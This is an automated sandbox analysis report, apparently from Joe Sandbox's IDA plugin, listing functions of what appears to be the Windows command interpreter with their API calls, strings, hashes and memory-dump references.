Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
String ID:
API String ID: 3935429995-0
Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction ID: 8d1918fb772dca596d7b64b5f9a1c7f67757ac329bea5b1748c612268478e728
Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
Instruction Fuzzy Hash: D661F526A18752C6EB14CF21A40557DBBA4FF89F59F0A9139EE4AA3790EF3CD401C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F735B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON

Download Yara Rule

APIs

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F73620

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction ID: 561c349f05d72446dbc2d8c69a4889e751d43f2a2a625cf4f780ebef550170d1
Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
Instruction Fuzzy Hash: 7C91B232A09682C6EB648F25D8116FD76A0FF49749F08853AEE4E97794EF3CD545C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F7B13F

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

_get_osfhandle.MSVCRT ref: 00007FF683F7B22A
_get_osfhandle.MSVCRT ref: 00007FF683F7B241

Part of subcall function 00007FF683F81EA0: wcschr.MSVCRT ref: 00007FF683F81EB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F7B2F7

Strings

DPATH, xrefs: 00007FF683F8C078

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _get_osfhandlememset$wcschr
String ID: DPATH
API String ID: 3260997497-2010427443
Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
Instruction ID: f73b789df9b079a59deda5b5c7b5a244ce1ab9ece7c83bd35a8c39e7f5244ba7
Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
Instruction Fuzzy Hash: E1D18022A09682C6EB259B65D4421BD63A1FF45B94F5C4239DA1EE77D4DF3CE841C3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F87FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON

Download Yara Rule

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00007FF683F8802B
NtOpenFile.NTDLL ref: 00007FF683F88092
RtlReleaseRelativeName.NTDLL ref: 00007FF683F880A4
RtlFreeUnicodeString.NTDLL ref: 00007FF683F880B4

Part of subcall function 00007FF683F88114: NtQueryVolumeInformationFile.NTDLL ref: 00007FF683F88151

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF683F880E2
NtSetInformationFile.NTDLL ref: 00007FF683F90327
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F90342
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF683F90356

Strings

@P, xrefs: 00007FF683F8805E

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @P
API String ID: 1801357106-3670739982
Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction ID: 1adc038db020d8d3548eb11596e2388c6b5e76a9f526a412b26cee64696d69d6
Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
Instruction Fuzzy Hash: 02415E32B04A42DBE7108F61D4413ED7BA0FF89758F885239DA0DA3A98DF78D508C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F72220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F72287
memset.MSVCRT ref: 00007FF683F722AD
memset.MSVCRT ref: 00007FF683F722D3
memset.MSVCRT ref: 00007FF683F722F9

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F723F6
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72415
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72434
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F72453

Part of subcall function 00007FF683F72618: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00008000,00007FF683F72397), ref: 00007FF683F72666

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$BufferConsoleInfoScreen
String ID:
API String ID: 1034426908-0
Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction ID: af219a01b049c0b21d22226ba96ef1a4bf0f54baa5f1cc7ccf4eb5e207939020
Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
Instruction Fuzzy Hash: 12F1AD32A087C2DAEB64CF21D8526E967B0FF45788F484139DA4EAB695DF3CE544C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9AC4C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 194registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AD67
RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9ADF0
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AE17
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AE94
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AED1
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AEFA

Strings

%s=%s, xrefs: 00007FF683F9AEA9
\Shell\Open\Command, xrefs: 00007FF683F9AD12

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
Instruction ID: 91e4d5310b9da5a5ee96fcaed95977f0c52f6372dc4d9672563d2a468fb00b02
Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
Instruction Fuzzy Hash: 7171D631B09782C6EF509F26E0522B9A2A1FF89794F484139DE4EA7794DF3CE545C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AA85
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AACF
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF683F9AAEC
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9AB39
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9AB6F
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9ABA4
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF683F998C0), ref: 00007FF683F9ABCB

Strings

%s=%s, xrefs: 00007FF683F9AB02

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction ID: 38f9e2dfd8ca892379cf5fc3a526ecec95c8c8ebc9d953db16cc868a48889363
Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
Instruction Fuzzy Hash: E051A331B08B92C6EB608F25A44677A7AA5FF89790F488239CE5DE3794DF38D445CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F71884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON

Download Yara Rule

APIs

wcsrchr.MSVCRT ref: 00007FF683F7194E
_wcsnicmp.MSVCRT ref: 00007FF683F719A1
wcsrchr.MSVCRT ref: 00007FF683F71A1D
_wcsnicmp.MSVCRT ref: 00007FF683F71A75

Strings

COPYCMD, xrefs: 00007FF683F7192B, 00007FF683F719F9

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsnicmpwcsrchr
String ID: COPYCMD
API String ID: 2429825313-3727491224
Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction ID: 2ca686ce8cef95febb28615fae600015e99dffe7077e21eaf3b9b42ab7268977
Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
Instruction Fuzzy Hash: 10F18E62F08692CAFB609F5590425BD22B5BF04B98F08463DEE5EB7794DF3CA459C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F74A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F74A87

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

wcsrchr.MSVCRT ref: 00007FF683F74B19
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F74B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F74BDD

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$FullNamePathwcsrchr
String ID:
API String ID: 4289998964-0
Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction ID: 5238864a448595cc60df1737a31b13d570f87c71f8152bf6ffd1f7e2dc7305b4
Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
Instruction Fuzzy Hash: 15C1B411B0939AD2EE949F56D54A779A3A0FF45B90F085539CE0EA7BD0DF3CA491C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF683F9BD2C
fflush.MSVCRT ref: 00007FF683F9BD45
TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F9BD62
NtCancelSynchronousIoFile.NTDLL ref: 00007FF683F9BD80
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF683F9BD93
_get_osfhandle.MSVCRT ref: 00007FF683F9BDB5
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF683F9BDC4

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
String ID:
API String ID: 3476366620-0
Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
Instruction ID: 6255f49ff3f877e16380cbb815d7df2f53dc052f0f1dc8410ced3763690105a8
Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
Instruction Fuzzy Hash: 7B21C120909A43D6FA145F10D8172B96791FF89B55F8C523ED95EF32E1DF3CA409C680

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F73D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

_setjmp.MSVCRT ref: 00007FF683F73DD4

Part of subcall function 00007FF683F8417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF683F841AD

Part of subcall function 00007FF683F71884: wcsrchr.MSVCRT ref: 00007FF683F7194E
Part of subcall function 00007FF683F71884: _wcsnicmp.MSVCRT ref: 00007FF683F719A1

NtQueryInformationProcess.NTDLL ref: 00007FF683F73E9C
NtSetInformationProcess.NTDLL ref: 00007FF683F73EC9
NtSetInformationProcess.NTDLL ref: 00007FF683F73F4D

Strings

%9d, xrefs: 00007FF683F73EF9

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
String ID: %9d
API String ID: 1006866328-2241623522
Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction ID: 30b483812017c69ca558d9e1bccfa9d90f2c5f7d8c90ace072b302e2e51f6584
Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
Instruction Fuzzy Hash: 9F516DB2A08652DAE700CF21E8425A97BB4FF44758F484639DA2DB77A5CF3CE545CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F78DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F78E6D
memset.MSVCRT ref: 00007FF683F78E93

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78F9A
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F78FBC

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction ID: 202834b27d10a591d8e7e0058ac6f9a5ce5daf33c6fe3a5e6a3867e9b5b4acca
Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
Instruction Fuzzy Hash: D0C1E422A097C2C6EB64DB21E852AF963B5FF95788F084139DA1D977A0DF3CE551C380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F79B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction ID: 15594b411d9f136431497241f011fb00f9bb85885ca05a60fe18bc3796446f13
Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
Instruction Fuzzy Hash: 18A1C021A19682C2EB649F26A45367A62B5FF89B80F48413DDE4EE7791DF3CE401C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F9FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF683F9FBC1

Part of subcall function 00007FF683F7CA40: memset.MSVCRT ref: 00007FF683F7CAB3

GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF683F9FC58
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF683F9FD01

Strings

%5lu, xrefs: 00007FF683F9FCB0

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: memset$DiskFreeSpace
String ID: %5lu
API String ID: 2448137811-2100233843
Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction ID: 40f5cae872ad954ab9e42fc4c09f330466e9d6f219f4e79ee5e20d6aa4692c87
Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
Instruction Fuzzy Hash: 06416D22608AC1C5EB65DF11E8426EA7361FF84789F48803AEE4D6BB58DF7CD249C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF683F7D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF683F7D292

Strings

GeToken: (%x) '%s', xrefs: 00007FF683F8D0C8

Memory Dump Source

Source File: 00000003.00000002.1647444262.00007FF683F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF683F70000, based on PE: true

Associated: 00000003.00000002.1647429542.00007FF683F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647471611.00007FF683FA2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FAD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647488900.00007FF683FBF000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1647547774.00007FF683FC9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff683f70000_alpha.jbxd

Similarity

API ID: _wcsicmp
String ID: GeToken: (%x) '%s'
API String ID: 2081463915-1994581435
Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction ID: a061021b3a4051615c37df8637e387ba8f5f1e3f911e95f7752ec7d093b057c3
Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
Instruction Fuzzy Hash: 03719D20E0C692C6FBA5AB25A84627526B0BF20754F5C453EE55EF76E0DF7CA482C7C0

Uniqueness

